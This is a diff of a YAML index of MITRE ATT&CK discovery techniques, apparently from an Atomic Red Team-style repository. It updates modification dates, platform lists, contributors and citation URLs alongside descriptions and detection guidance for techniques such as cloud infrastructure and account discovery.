+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -49739,7 +50433,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -49769,7 +50462,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -49807,12 +50500,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49839,14 +50531,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -49875,7 +50566,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -49935,7 +50625,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -49954,7 +50644,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50023,12 +50712,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50105,40 +50793,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50150,6 +50809,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50160,8 +50823,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50171,9 +50840,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50206,7 +50894,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50224,12 +50912,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50237,11 +50924,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50252,7 +50942,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50266,6 +50956,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50285,56 +50979,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50356,19 +51005,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50439,46 +51130,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -50502,6 +51158,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -50512,9 +51171,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50524,12 +51188,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50572,12 +51263,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50588,28 +51278,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
